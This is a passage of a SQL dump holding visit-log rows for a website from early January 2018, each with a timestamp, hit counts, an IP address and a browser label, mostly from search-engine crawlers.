other'),(194214,1514968249,1,1,0,0,'54.36.148.114','other'),(194215,1514968353,1,1,0,0,'37.52.19.141','firefox'),(194216,1514968384,1,1,0,0,'91.196.178.68','chrome'),(194217,1514968739,1,1,0,0,'37.52.115.215','chrome'),(194218,1514968756,1,1,0,0,'35.226.23.240','other'),(194219,1514968797,1,1,0,0,'54.36.148.28','other'),(194220,1514968826,1,1,0,0,'66.249.69.105','chrome'),(194221,1514968836,1,1,0,0,'54.36.148.198','other'),(194222,1514968923,1,1,0,0,'54.36.148.92','other'),(194223,1514969000,1,0,1,0,'66.249.69.57',''),(194224,1514969182,1,1,0,0,'66.249.69.59','chrome'),(194225,1514969242,1,1,0,0,'54.36.149.81','other'),(194226,1514969549,1,1,0,0,'54.36.148.143','other'),(194227,1514969824,1,1,0,0,'91.196.178.166','chrome'),(194228,1514969918,1,1,0,0,'91.196.177.15','chrome'),(194229,1514970574,1,1,0,0,'91.196.177.46','other'),(194230,1514970964,1,1,0,0,'8.29.198.25','other'),(194231,1514971065,1,1,0,0,'91.196.178.68','chrome'),(194232,1514971130,1,1,0,0,'54.36.149.27','other'),(194233,1514971169,1,1,0,0,'51.255.71.119','other'),(194234,1514971300,1,1,0,0,'54.36.148.147','other'),(194235,1514971379,1,1,0,0,'95.133.57.12','firefox'),(194236,1514971542,1,1,0,0,'54.36.148.107','other'),(194237,1514971599,1,1,0,0,'37.52.171.76','chrome'),(194238,1514971872,1,1,0,0,'54.36.149.99','other'),(194239,1514972124,1,1,0,0,'193.0.247.178','firefox'),(194240,1514972166,1,1,0,0,'54.36.148.126','other'),(194241,1514972320,1,1,0,0,'91.196.177.15','chrome'),(194242,1514972732,1,1,0,0,'54.36.148.44','other'),(194243,1514972891,1,1,0,0,'51.255.71.117','other'),(194244,1514973075,1,1,0,0,'54.36.149.175','other'),(194245,1514973469,2,2,0,0,'91.196.178.67','chrome'),(194246,1514973493,1,1,0,0,'54.36.148.60','other'),(194247,1514973600,1,1,0,0,'54.36.148.150','other'),(194248,1514973636,1,0,1,0,'66.249.69.99',''),(194249,1514973645,1,1,0,0,'91.196.178.169','chrome'),(194250,1514973746,1,1,0,0,'51.255.71.113','other'),(194251,1514973801,1,1,0,0,'54.36.148.142','other'),(194252,1514973810,1,1,0,0,'66.249.69.99','chrome'),(194253,1514973950,1,1,0,0,'66.249.69.61','chrome'),(194254,1514974074,1,1,0,0,'54.36.149.1','other'),(194255,1514974111,1,1,0,0,'91.196.178.163','chrome'),(194256,1514974307,1,1,0,0,'77.111.244.37','chrome'),(194257,1514974981,1,1,0,0,'54.36.148.14','other'),(194258,1514975283,1,1,0,0,'54.36.148.98','other'),(194259,1514975385,1,1,0,0,'51.255.71.125','other'),(194260,1514975437,1,1,0,0,'54.36.148.200','other'),(194261,1514975589,1,1,0,0,'51.255.71.121','other'),(194262,1514976728,1,1,0,0,'54.36.148.206','other'),(194263,1514976915,1,1,0,0,'91.196.178.67','chrome'),(194264,1514977018,1,1,0,0,'54.36.148.231','other'),(194265,1514977128,1,1,0,0,'54.36.148.235','other'),(194266,1514977355,1,1,0,0,'54.36.148.182','other'),(194267,1514977495,1,1,0,0,'54.36.148.169','other'),(194268,1514977733,1,1,0,0,'54.36.148.69','other'),(194269,1514977734,1,0,1,0,'66.249.69.61',''),(194270,1514978096,1,1,0,0,'54.36.148.139','other'),(194271,1514978169,1,1,0,0,'91.196.178.166','chrome'),(194272,1514978248,1,0,1,0,'66.249.69.105',''),(194273,1514978287,1,1,0,0,'194.183.183.82','chrome'),(194274,1514978398,1,0,1,0,'66.249.69.99',''),(194275,1514979130,1,1,0,0,'82.207.91.234','other'),(194276,1514979195,1,0,1,0,'66.249.69.103',''),(194277,1514979355,1,1,0,0,'66.249.69.59','chrome'),(194278,1514979356,1,1,0,0,'141.8.132.19','other'),(194279,1514979362,1,1,0,0,'66.249.69.99','chrome'),(194280,1514979371,1,1,0,0,'54.36.148.155','other'),(194281,1514979458,1,1,0,0,'37.52.5.104','chrome'),(194282,1514979498,1,1,0,0,'54.36.148.27','other'),(194283,1514979665,1,1,0,0,'54.36.148.161','other'),(194284,1514979833,1,1,0,0,'54.36.149.46','other'),(194285,1514979853,2,2,0,0,'91.196.178.52','chrome'),(194286,1514980288,1,1,0,0,'87.250.224.46','other'),(194287,1514980618,1,1,0,0,'54.36.148.39','other'),(194288,1514981072,1,1,0,0,'54.36.148.242','other'),(194289,1514981202,2,0,2,0,'66.249.69.103',''),(194290,1514981457,1,1,0,0,'54.36.148.24','other'),(194291,1514981467,1,1,0,0,'54.36.148.13','other'),(194292,1514981516,1,0,1,0,'66.249.69.61',''),(194293,1514981711,1,1,0,0,'37.54.88.75','chrome'),(194294,1514981814,1,1,0,0,'8.29.198.25','other'),(194295,1514982028,1,0,1,0,'66.249.69.105',''),(194296,1514982060,1,1,0,0,'188.230.43.254','other'),(194297,1514982186,1,1,0,0,'77.52.193.178','chrome'),(194298,1514982287,1,1,0,0,'216.244.66.194','other'),(194299,1514982429,1,1,0,0,'54.36.149.16','other'),(194300,1514982514,1,0,1,0,'66.249.69.103',''),(194301,1514982522,1,0,1,0,'66.249.69.99',''),(194302,1514982548,1,1,0,0,'54.36.149.104','other'),(194303,1514982701,1,1,0,0,'51.255.71.123','other'),(194304,1514982779,1,1,0,0,'54.36.148.40','other'),(194305,1514982927,1,1,0,0,'89.178.239.5','chrome'),(194306,1514982939,1,0,1,0,'66.249.69.61',''),(194307,1514983008,1,1,0,0,'54.36.148.29','other'),(194308,1514983232,1,1,0,0,'51.255.71.131','other'),(194309,1514983407,1,1,0,0,'195.10.210.70','chrome'),(194310,1514983551,1,1,0,0,'91.196.178.101','chrome'),(194311,1514983865,1,1,0,0,'54.36.148.81','other'),(194312,1514983975,1,1,0,0,'157.55.39.11','other'),(194313,1514984286,1,0,1,0,'66.249.69.105',''),(194314,1514984669,1,1,0,0,'66.249.69.99','chrome'),(194315,1514984673,1,1,0,0,'66.249.69.57','chrome'),(194316,1514984690,1,1,0,0,'195.10.210.70','chrome'),(194317,1514984782,1,1,0,0,'54.36.148.125','other'),(194318,1514984926,1,1,0,0,'51.255.71.133','other'),(194319,1514985091,1,1,0,0,'54.36.148.103','other'),(194320,1514985092,1,1,0,0,'54.36.148.91','other'),(194321,1514985152,2,2,0,0,'207.46.13.85','other'),(194322,1514985225,1,1,0,0,'54.36.148.10','other'),(194323,1514985349,1,0,1,0,'66.249.69.61',''),(194324,1514985402,1,0,1,0,'66.249.69.105',''),(194325,1514985648,1,1,0,0,'54.36.149.29','other'),(194326,1514985730,1,1,0,0,'92.113.60.83','chrome'),(194327,1514985940,4,0,4,0,'66.249.69.99',''),(194328,1514986127,1,1,0,0,'77.52.193.178','chrome'),(194329,1514986235,1,1,0,0,'54.36.148.153','other'),(194330,1514986416,1,1,0,0,'91.196.178.133','firefox'),(194331,1514986474,1,1,0,0,'54.36.148.12','other'),(194332,1514987172,1,1,0,0,'91.237.107.13','chrome'),(194333,1514987223,1,1,0,0,'54.36.148.149','other'),(194334,1514987741,1,1,0,0,'157.55.39.112','other'),(194335,1514987783,1,0,1,0,'66.249.69.105',''),(194336,1514988126,1,0,1,0,'66.249.69.59',''),(194337,1514988260,1,1,0,0,'54.36.149.25','other'),(194338,1514988447,1,1,0,0,'54.36.149.102','other'),(194339,1514989040,1,1,0,0,'54.36.148.185','other'),(194340,1514989282,1,1,0,0,'51.255.71.119','other'),(194341,1514989627,1,1,0,0,'54.36.148.139','other'),(194342,1514989637,2,2,0,0,'66.249.69.105','chrome'),(194343,1514989908,1,1,0,0,'54.36.148.250','other'),(194344,1514990206,1,1,0,0,'54.36.148.99','other'),(194345,1514990325,1,1,0,0,'54.36.148.113','other'),(194346,1514990489,1,1,0,0,'199.58.86.209','other'),(194347,1514990591,1,1,0,0,'54.36.148.125','other'),(194348,1514990840,1,1,0,0,'220.181.132.178','chrome'),(194349,1514990889,1,1,0,0,'106.120.162.96','chrome'),(194350,1514991032,1,1,0,0,'37.55.62.161','chrome'),(194351,1514991086,1,1,0,0,'95.132.12.243','firefox'),(194352,1514991152,1,1,0,0,'91.196.178.68','firefox'),(194353,1514991440,1,1,0,0,'54.36.148.177','other'),(194354,1514991479,1,1,0,0,'54.36.148.173','other'),(194355,1514991590,1,1,0,0,'91.196.178.68','chrome'),(194356,1514991625,1,1,0,0,'66.249.69.61','chrome'),(194357,1514991959,1,1,0,0,'207.46.13.85','other'),(194358,1514991987,1,1,0,0,'54.36.148.93','other'),(194359,1514992411,1,0,1,0,'66.249.69.103',''),(194360,1514992570,1,1,0,0,'37.9.113.182','other'),(194361,1514992571,1,1,0,0,'141.8.142.74','other'),(194362,1514992658,1,1,0,0,'8.29.198.25','other'),(194363,1514993364,1,1,0,0,'54.36.148.58','other'),(194364,1514994033,1,1,0,0,'157.55.39.112','other'),(194365,1514994197,1,0,1,0,'66.249.69.103',''),(194366,1514995118,1,1,0,0,'64.246.165.150','firefox'),(194367,1514995384,1,1,0,0,'207.46.13.85','other'),(194368,1514995944,1,1,0,0,'141.8.142.74','other'),(194369,1514995957,1,1,0,0,'54.36.148.27','other'),(194370,1514996016,1,1,0,0,'91.196.178.131','firefox'),(194371,1514996031,1,1,0,0,'92.113.126.60','chrome'),(194372,1514996179,1,1,0,0,'54.36.149.33','other'),(194373,1514996405,1,1,0,0,'91.196.178.163','chrome'),(194374,1514996698,1,1,0,0,'54.36.148.246','other'),(194375,1514996934,1,0,1,0,'66.249.69.39',''),(194376,1514997036,1,1,0,0,'188.230.43.254','other'),(194377,1514997488,1,1,0,0,'54.36.149.30','other'),(194378,1514998039,1,1,0,0,'54.36.148.255','other'),(194379,1514998095,1,1,0,0,'88.150.250.242','chrome'),(194380,1514998325,1,1,0,0,'54.36.149.90','other'),(194381,1514999057,1,1,0,0,'51.255.71.129','other'),(194382,1514999262,1,1,0,0,'54.36.148.177','other'),(194383,1514999345,1,1,0,0,'77.37.220.207','msie'),(194384,1514999434,1,1,0,0,'188.230.43.254','other'),(194385,1514999500,1,0,1,0,'66.249.69.195',''),(194386,1514999656,1,0,1,0,'66.249.69.158',''),(194387,1514999953,1,1,0,0,'93.75.8.57','chrome'),(194388,1515000528,1,1,0,0,'54.36.149.106','other'),(194389,1515000647,1,1,0,0,'54.36.148.150','other'),(194390,1515000870,1,1,0,0,'107.167.104.185','other'),(194391,1515001087,1,1,0,0,'54.36.148.118','other'),(194392,1515001143,1,0,1,0,'66.249.69.156',''),(194393,1515001624,1,0,1,0,'66.249.69.195',''),(194394,1515001654,1,1,0,0,'54.36.148.168','other'),(194395,1515001719,1,1,0,0,'141.8.142.74','other'),(194396,1515001934,1,1,0,0,'54.36.148.172','other'),(194397,1515002095,1,1,0,0,'54.36.149.64','other'),(194398,1515002434,1,1,0,0,'51.255.71.131','other'),(194399,1515003024,1,1,0,0,'66.249.69.195','chrome'),(194400,1515003088,1,1,0,0,'91.196.178.56','chrome'),(194401,1515003251,1,1,0,0,'54.36.148.114','other'),(194402,1515003512,1,1,0,0,'8.29.198.26','other'),(194403,1515003887,1,1,0,0,'51.255.71.129','other'),(194404,1515003946,1,1,0,0,'54.36.148.255','other'),(194405,1515004212,1,1,0,0,'54.36.149.53','other'),(194406,1515004278,1,1,0,0,'54.36.149.91','other'),(194407,1515004391,1,1,0,0,'91.196.178.132','chrome'),(194408,1515004392,1,1,0,0,'54.36.149.18','other'),(194409,1515004528,1,1,0,0,'54.36.148.124','other'),(194410,1515006164,1,1,0,0,'66.249.69.103','chrome'),(194411,1515006595,1,1,0,0,'54.36.148.172','other'),(194412,1515006808,1,1,0,0,'37.73.234.210','chrome'),(194413,1515006866,1,1,0,0,'54.36.148.19','other'),(194414,1515006913,1,1,0,0,'54.36.148.78','other'),(194415,1515007697,2,0,2,0,'66.249.69.99',''),(194416,1515007700,1,0,1,0,'66.249.69.103',''),(194417,1515007880,1,1,0,0,'54.36.148.31','other'),(194418,1515008085,1,1,0,0,'54.36.148.253','other'),(194419,1515008547,1,1,0,0,'54.36.148.248','other'),(194420,1515008693,1,1,0,0,'107.167.105.131','other'),(194421,1515009280,1,1,0,0,'54.36.148.50','other'),(194422,1515009604,1,1,0,0,'176.8.141.224','chrome'),(194423,1515009721,1,1,0,0,'54.36.148.56','other'),(194424,1515009806,1,1,0,0,'178.154.171.88','other'),(194425,1515010188,3,1,2,0,'66.249.69.99',''),(194426,1515010235,2,2,0,0,'144.76.19.144','other'),(194427,1515011082,1,1,0,0,'54.36.148.167','other'),(194428,1515011122,1,1,0,0,'54.36.148.202','other'),(194429,1515011442,1,1,0,0,'54.36.148.124','other'),(194430,1515011716,1,1,0,0,'54.36.149.26','other'),(194431,1515012011,2,2,0,0,'157.55.39.204','other'),(194432,1515012044,1,1,0,0,'91.124.182.91','chrome'),(194433,1515012114,1,1,0,0,'54.36.148.204','other'),(194434,1515012131,1,1,0,0,'54.36.148.111','other'),(194435,1515012311,1,1,0,0,'66.249.69.103','chrome'),(194436,1515012345,1,1,0,0,'54.36.148.78','other'),(194437,1515012519,1,1,0,0,'54.36.148.13','other'),(194438,1515012821,1,1,0,0,'54.36.148.254','other'),(194439,1515012832,1,1,0,0,'54.36.148.84','other'),(194440,1515012884,1,0,1,0,'66.249.69.99',''),(194441,1515013084,1,1,0,0,'91.196.178.22','chrome'),(194442,1515014103,1,1,0,0,'54.36.149.46','other'),(194443,1515014164,2,1,1,0,'66.249.69.105',''),(194444,1515014270,2,0,2,0,'66.249.69.219',''),(194445,1515014326,2,1,1,0,'66.249.69.217',''),(194446,1515014328,1,1,0,0,'66.249.69.103','chrome'),(194447,1515014360,1,1,0,0,'8.29.198.25','other'),(194448,1515014363,1,1,0,0,'54.36.149.3','other'),(194449,1515014939,1,0,1,0,'66.249.69.99',''),(194450,1515015500,1,0,1,0,'66.249.69.103',''),(194451,1515015542,1,1,0,0,'54.36.149.25','other'),(194452,1515015898,1,1,0,0,'54.36.148.55','other'),(194453,1515016356,1,1,0,0,'54.36.148.238','other'),(194454,1515016494,1,1,0,0,'54.36.148.57','other'),(194455,1515016978,1,1,0,0,'54.36.149.37','other'),(194456,1515017187,1,1,0,0,'54.36.149.29','other'),(194457,1515017252,1,1,0,0,'66.249.69.217','chrome'),(194458,1515017784,1,1,0,0,'54.36.148.182','other'),(194459,1515017849,1,1,0,0,'51.255.71.123','other'),(194460,1515018764,2,0,2,0,'66.249.69.99',''),(194461,1515018784,1,0,1,0,'66.249.69.105',''),(194462,1515019600,1,1,0,0,'54.36.148.190','other'),(194463,1515019619,1,1,0,0,'54.36.149.62','other'),(194464,1515020974,1,0,1,0,'66.249.69.99',''),(194465,1515021005,1,0,1,0,'66.249.69.217',''),(194466,1515021006,1,1,0,0,'66.249.69.99','chrome'),(194467,1515021010,1,1,0,0,'66.249.69.217','chrome'),(194468,1515021327,1,1,0,0,'79.111.132.221','chrome'),(194469,1515021472,1,1,0,0,'51.255.71.117','other'),(194470,1515021825,2,2,0,0,'54.36.148.141','other'),(194471,1515021978,1,1,0,0,'54.36.148.178','other'),(194472,1515022458,1,1,0,0,'54.36.148.179','other'),(194473,1515022507,1,1,0,0,'54.36.148.26','other'),(194474,1515023017,1,1,0,0,'54.36.149.60','other'),(194475,1515023288,1,1,0,0,'54.36.148.99','other'),(194476,1515023407,1,1,0,0,'54.36.149.104','other'),(194477,1515023415,1,1,0,0,'51.255.71.115','other'),(194478,1515023640,1,1,0,0,'54.36.148.30','other'),(194479,1515023932,1,1,0,0,'54.36.149.22','other'),(194480,1515024118,1,1,0,0,'54.36.148.23','other'),(194481,1515024348,1,1,0,0,'54.36.148.139','other'),(194482,1515024444,1,1,0,0,'54.36.148.53','other'),(194483,1515024985,1,1,0,0,'157.55.39.112','other'),(194484,1515024987,1,1,0,0,'54.36.148.247','other'),(194485,1515025203,1,1,0,0,'8.29.198.25','other'),(194486,1515025295,1,1,0,0,'157.55.39.132','other'),(194487,1515025366,1,1,0,0,'54.36.149.59','other'),(194488,1515025902,1,1,0,0,'54.36.148.10','other'),(194489,1515026115,1,0,1,0,'66.249.69.99',''),(194490,1515026127,1,0,1,0,'66.249.69.217',''),(194491,1515026201,1,0,1,0,'66.249.69.221',''),(194492,1515026437,1,1,0,0,'51.255.71.123','other'),(194493,1515026657,1,1,0,0,'66.249.69.103','chrome'),(194494,1515026659,1,1,0,0,'66.249.69.219','chrome'),(194495,1515026832,1,1,0,0,'157.55.39.132','other'),(194496,1515027017,4,4,0,0,'54.165.59.7','other'),(194497,1515027154,1,1,0,0,'54.36.149.100','other'),(194498,1515027366,1,1,0,0,'54.36.149.4','other'),(194499,1515027597,1,1,0,0,'54.36.148.62','other'),(194500,1515027736,1,1,0,0,'5.53.113.210','firefox'),(194501,1515027789,1,1,0,0,'54.36.148.248','other'),(194502,1515027967,1,1,0,0,'54.36.149.63','other'),(194503,1515028130,2,0,2,0,'66.249.69.103',''),(194504,1515028195,1,0,1,0,'66.249.69.219',''),(194505,1515028791,1,1,0,0,'54.36.148.235','other'),(194506,1515029045,1,1,0,0,'54.36.148.35','other'),(194507,1515029144,2,2,0,0,'54.165.59.7','other'),(194508,1515029242,1,1,0,0,'5.53.113.210','firefox'),(194509,1515029288,2,0,2,0,'66.249.69.103',''),(194510,1515029401,1,1,0,0,'51.255.71.117','other'),(194511,1515029415,1,1,0,0,'141.8.142.74','other'),(194512,1515029740,1,1,0,0,'89.178.234.77','msie'),(194513,1515029790,1,1,0,0,'54.36.149.82','other'),(194514,1515030793,1,1,0,0,'157.55.39.132','other'),(194515,1515030986,1,1,0,0,'178.154.171.88','other'),(194516,1515031101,1,1,0,0,'54.36.148.186','other'),(194517,1515031287,1,1,0,0,'54.36.148.112','other'),(194518,1515031714,1,1,0,0,'157.55.39.112','other'),(194519,1515031890,1,1,0,0,'66.249.69.105','chrome'),(194520,1515031894,1,1,0,0,'66.249.69.219','chrome'),(194521,1515032007,1,1,0,0,'54.36.149.60','other'),(194522,1515032033,1,0,1,0,'66.249.69.217',''),(194523,1515032250,1,1,0,0,'216.244.66.246','other'),(194524,1515032677,1,0,1,0,'66.249.69.103',''),(194525,1515032902,2,1,1,0,'66.249.69.103',''),(194526,1515033135,1,1,0,0,'54.36.148.171','other'),(194527,1515033357,1,1,0,0,'51.255.71.118','other'),(194528,1515033470,1,1,0,0,'54.36.149.88','other'),(194529,1515033778,1,0,1,0,'66.249.69.221',''),(194530,1515034031,1,1,0,0,'54.36.149.35','other'),(194531,1515034065,1,1,0,0,'54.36.149.84','other'),(194532,1515034110,1,0,1,0,'66.249.69.219',''),(194533,1515034640,1,1,0,0,'54.36.148.108','other'),(194534,1515034726,2,2,0,0,'163.172.255.139','chrome'),(194535,1515034773,1,1,0,0,'54.36.149.14','other'),(194536,1515034798,1,1,0,0,'54.36.149.24','other'),(194537,1515035196,1,1,0,0,'157.55.39.204','other'),(194538,1515035327,1,1,0,0,'207.46.13.85','other'),(194539,1515035381,1,1,0,0,'54.36.148.229','other'),(194540,1515035625,1,1,0,0,'54.36.148.116','other'),(194541,1515035646,1,0,1,0,'66.249.69.99',''),(194542,1515035725,1,1,0,0,'54.36.149.70','other'),(194543,1515035830,2,2,0,0,'178.154.171.88','other'),(194544,1515036045,1,1,0,0,'8.29.198.26','other'),(194545,1515036170,1,1,0,0,'54.36.148.165','other'),(194546,1515036655,1,1,0,0,'157.55.39.112','other'),(194547,1515037087,1,1,0,0,'54.36.149.88','other'),(194548,1515037193,1,1,0,0,'54.36.149.93','other'),(194549,1515037684,1,1,0,0,'54.36.148.12','other'),(194550,1515037696,1,1,0,0,'74.115.214.141','other'),(194551,1515038196,1,1,0,0,'66.249.69.99','chrome'),(194552,1515038283,1,1,0,0,'66.249.69.61','chrome'),(194553,1515038359,1,1,0,0,'54.36.148.40','other'),(194554,1515038419,1,1,0,0,'95.132.14.245','firefox'),(194555,1515038462,1,1,0,0,'54.36.148.102','other'),(194556,1515038486,1,1,0,0,'54.36.148.253','other'),(194557,1515038952,1,1,0,0,'66.249.69.103','chrome'),(194558,1515038969,1,0,1,0,'66.249.69.59',''),(194559,1515039644,1,1,0,0,'54.36.148.52','other'),(194560,1515039770,1,1,0,0,'54.36.148.158','other'),(194561,1515039949,1,1,0,0,'54.36.149.17','other'),(194562,1515040023,1,1,0,0,'66.249.69.105','chrome'),(194563,1515040141,1,1,0,0,'54.36.149.43','other'),(194564,1515040216,1,1,0,0,'66.249.69.57','chrome'),(194565,1515040330,1,1,0,0,'107.167.104.68','other'),(194566,1515040660,1,1,0,0,'54.36.148.85','other'),(194567,1515040687,1,1,0,0,'54.36.149.49','other'),(194568,1515040964,1,0,1,0,'66.249.69.59',''),(194569,1515041146,2,2,0,0,'54.36.148.121','other'),(194570,1515041868,1,1,0,0,'141.8.142.74','other'),(194571,1515042357,1,1,0,0,'54.36.148.183','other'),(194572,1515042608,2,0,2,0,'66.249.69.105',''),(194573,1515042698,1,0,1,0,'66.249.69.99',''),(194574,1515042794,1,1,0,0,'207.46.13.85','other'),(194575,1515043116,1,1,0,0,'54.36.148.82','other'),(194576,1515043355,1,1,0,0,'54.36.149.106','other'),(194577,1515043476,1,0,1,0,'66.249.69.103',''),(194578,1515043503,1,1,0,0,'109.63.128.80','msie'),(194579,1515043740,1,1,0,0,'54.36.149.100','other'),(194580,1515044146,1,1,0,0,'176.193.92.236','msie'),(194581,1515044522,1,1,0,0,'54.36.149.67','other'),(194582,1515045375,1,1,0,0,'54.36.148.112','other'),(194583,1515046295,1,1,0,0,'51.255.71.114','other'),(194584,1515046343,1,1,0,0,'54.36.149.38','other'),(194585,1515046482,1,1,0,0,'54.36.148.40','other'),(194586,1515046764,1,1,0,0,'54.36.149.43','other'),(194587,1515046774,1,0,1,0,'66.249.69.103',''),(194588,1515046878,1,1,0,0,'8.29.198.26','other'),(194589,1515047534,1,1,0,0,'54.36.148.154','other'),(194590,1515047798,1,1,0,0,'54.36.148.239','other'),(194591,1515047877,1,0,1,0,'66.249.69.61',''),(194592,1515047879,1,1,0,0,'91.196.178.68','chrome'),(194593,1515047885,1,1,0,0,'54.36.149.9','other'),(194595,1515047919,1,1,0,0,'54.36.148.176','other'),(194596,1515048145,1,1,0,0,'66.249.69.103','chrome'),(194597,1515048161,1,1,0,0,'66.249.69.61','chrome'),(194598,1515048235,1,1,0,0,'37.73.236.221','chrome'),(194599,1515048764,1,1,0,0,'46.188.106.62','chrome'),(194600,1515048766,1,1,0,0,'176.15.19.105','chrome'),(194601,1515048775,1,1,0,0,'91.196.179.138','chrome'),(194602,1515048930,1,1,0,0,'91.196.178.166','chrome'),(194603,1515049175,1,1,0,0,'157.55.39.132','other'),(194604,1515049199,1,1,0,0,'54.36.148.123','other'),(194605,1515049352,1,1,0,0,'91.196.178.68','chrome'),(194606,1515049483,1,0,1,0,'66.249.69.103',''),(194607,1515049516,1,1,0,0,'54.36.149.103','other'),(194608,1515049980,1,1,0,0,'85.21.233.180','other'),(194609,1515050246,1,1,0,0,'54.36.149.8','other'),(194610,1515050251,1,1,0,0,'37.54.89.48','chrome'),(194611,1515050275,1,1,0,0,'141.8.142.74','other'),(194612,1515050280,1,1,0,0,'91.196.178.68','chrome'),(194613,1515050326,1,1,0,0,'91.196.178.47','chrome'),(194614,1515050555,1,1,0,0,'54.36.148.185','other'),(194615,1515050610,1,1,0,0,'54.36.149.42','other'),(194616,1515050620,1,0,1,0,'66.249.69.103',''),(194617,1515051037,1,1,0,0,'54.36.148.176','other'),(194618,1515051155,1,1,0,0,'51.255.71.122','other'),(194619,1515051326,1,1,0,0,'107.167.107.103','other'),(194620,1515051453,1,1,0,0,'37.73.211.198','chrome'),(194621,1515051484,1,1,0,0,'54.36.148.164','other'),(194622,1515052251,1,0,1,0,'66.249.69.99',''),(194623,1515052293,1,1,0,0,'141.8.142.74','other'),(194624,1515052438,1,1,0,0,'54.36.148.73','other'),(194625,1515052748,1,1,0,0,'13.56.229.65','chrome'),(194626,1515053066,1,1,0,0,'54.36.148.146','other'),(194627,1515053422,1,1,0,0,'216.244.66.237','other'),(194628,1515053851,1,1,0,0,'54.36.148.231','other'),(194629,1515054309,1,0,1,0,'66.249.69.105',''),(194630,1515054360,1,1,0,0,'91.196.178.68','chrome'),(194631,1515054675,1,1,0,0,'54.36.149.76','other'),(194632,1515054776,1,0,1,0,'66.249.69.103',''),(194633,1515054794,1,1,0,0,'54.36.148.191','other'),(194634,1515054993,1,0,1,0,'66.249.69.59',''),(194635,1515055075,1,1,0,0,'66.249.69.103','chrome'),(194636,1515055079,1,1,0,0,'66.249.69.57','chrome'),(194637,1515055341,1,1,0,0,'54.36.148.48','other'),(194638,1515055619,1,1,0,0,'54.36.148.153','other'),(194639,1515055860,1,1,0,0,'54.36.148.238','other'),(194640,1515056106,1,1,0,0,'35.153.255.221','other'),(194641,1515056265,1,0,1,0,'66.249.69.99',''),(194642,1515056634,1,1,0,0,'54.36.148.115','other'),(194643,1515056833,1,1,0,0,'207.46.13.85','other'),(194644,1515057026,2,2,0,0,'91.218.12.29','chrome'),(194645,1515057090,1,1,0,0,'35.226.23.240','other'),(194646,1515057390,1,1,0,0,'216.244.66.246','other'),(194647,1515057627,1,1,0,0,'91.196.178.68','chrome'),(194648,1515057707,1,1,0,0,'8.29.198.26','other'),(194649,1515058485,1,1,0,0,'178.154.171.88','other'),(194650,1515058638,1,1,0,0,'91.196.177.15','chrome'),(194651,1515058911,1,1,0,0,'77.111.244.7','chrome'),(194652,1515059028,1,1,0,0,'54.36.148.234','other'),(194653,1515059193,1,0,1,0,'66.249.69.105',''),(194654,1515059404,1,1,0,0,'178.93.144.214','chrome'),(194655,1515059460,1,1,0,0,'54.36.149.74','other'),(194656,1515059556,1,1,0,0,'95.135.240.99','chrome'),(194657,1515059584,1,1,0,0,'91.196.178.66','chrome'),(194658,1515059637,1,1,0,0,'54.36.148.102','other'),(194659,1515059927,1,1,0,0,'207.46.13.85','other'),(194660,1515060104,1,1,0,0,'54.36.148.54','other'),(194661,1515060189,1,0,1,0,'66.249.69.99',''),(194662,1515060221,2,2,0,0,'40.77.167.113','other'),(194663,1515060517,1,1,0,0,'207.46.13.195','other'),(194664,1515060521,1,1,0,0,'157.55.39.107','other'),(194665,1515060525,1,1,0,0,'157.55.39.80','other'),(194666,1515060681,1,1,0,0,'35.226.23.240','other'),(194667,1515060710,1,0,1,0,'66.249.69.61',''),(194668,1515060758,1,1,0,0,'66.249.69.105','chrome'),(194669,1515060777,1,1,0,0,'66.249.69.57','chrome'),(194670,1515061021,1,1,0,0,'141.8.142.74','other'),(194671,1515061460,1,1,0,0,'54.36.149.75','other'),(194672,1515061674,12,12,0,0,'88.198.23.179','other'),(194673,1515061714,1,1,0,0,'85.223.211.12','chrome'),(194674,1515061716,1,1,0,0,'54.36.148.167','other'),(194675,1515061767,1,1,0,0,'94.179.147.128','chrome'),(194676,1515061914,1,1,0,0,'46.188.73.72','msie'),(194677,1515062897,1,1,0,0,'130.180.218.163','chrome'),(194678,1515062969,1,1,0,0,'51.255.71.129','other'),(194679,1515063164,1,1,0,0,'54.36.149.59','other'),(194680,1515063333,1,1,0,0,'82.207.102.185','chrome'),(194681,1515063446,1,1,0,0,'141.8.142.74','other'),(194682,1515063482,1,0,1,0,'66.249.69.105',''),(194683,1515063484,1,1,0,0,'91.196.178.164','chrome'),(194684,1515063829,1,1,0,0,'54.36.149.89','other'),(194685,1515063884,1,1,0,0,'157.55.39.132','other'),(194686,1515064061,1,1,0,0,'54.36.149.8','other'),(194687,1515064533,1,0,1,0,'66.249.69.57',''),(194688,1515064573,1,1,0,0,'54.36.148.237','other'),(194689,1515064792,1,1,0,0,'54.36.148.188','other'),(194690,1515064991,1,1,0,0,'54.36.148.36','other'),(194691,1515065114,1,1,0,0,'216.244.66.237','other'),(194692,1515065186,1,1,0,0,'54.36.149.101','other'),(194693,1515065197,1,1,0,0,'91.196.178.68','firefox'),(194694,1515065213,1,0,1,0,'66.249.69.99',''),(194695,1515065924,1,1,0,0,'94.179.179.22','firefox'),(194696,1515065976,1,1,0,0,'54.36.148.136','other'),(194697,1515066185,1,1,0,0,'207.46.13.85','other'),(194698,1515066487,1,1,0,0,'66.249.69.103','chrome'),(194699,1515066515,1,1,0,0,'54.36.149.55','other'),(194700,1515066519,1,1,0,0,'66.249.69.57','chrome'),(194701,1515066739,1,1,0,0,'54.36.148.96','other'),(194702,1515066771,1,1,0,0,'54.36.148.147','other'),(194703,1515066796,1,1,0,0,'54.36.148.157','other'),(194704,1515066805,1,1,0,0,'216.244.66.194','other'),(194705,1515066979,1,0,1,0,'66.249.69.39',''),(194706,1515067872,1,1,0,0,'54.36.149.80','other'),(194707,1515068108,2,2,0,0,'54.36.148.239','other'),(194708,1515068218,1,1,0,0,'207.46.13.181','other'),(194709,1515068545,1,1,0,0,'8.29.198.25','other'),(194710,1515068660,1,1,0,0,'54.36.148.52','other'),(194711,1515069151,1,1,0,0,'51.255.71.126','other'),(194712,1515069231,1,1,0,0,'95.135.240.99','chrome'),(194713,1515069328,1,1,0,0,'51.255.71.118','other'),(194714,1515069435,1,1,0,0,'91.196.178.42','chrome'),(194715,1515069532,1,1,0,0,'157.55.39.112','other'),(194716,1515069625,1,1,0,0,'54.36.148.55','other'),(194717,1515070034,1,1,0,0,'54.36.148.168','other'),(194718,1515070043,1,1,0,0,'157.55.39.132','other'),(194719,1515070097,1,0,1,0,'66.249.69.221',''),(194720,1515070367,1,1,0,0,'54.36.148.86','other'),(194721,1515070372,1,0,1,0,'66.249.69.39',''),(194722,1515070539,1,1,0,0,'5.35.119.16','chrome'),(194723,1515070674,1,1,0,0,'54.36.148.100','other'),(194724,1515071457,1,1,0,0,'66.249.69.41','chrome'),(194725,1515071501,1,1,0,0,'66.249.69.221','chrome'),(194726,1515071621,1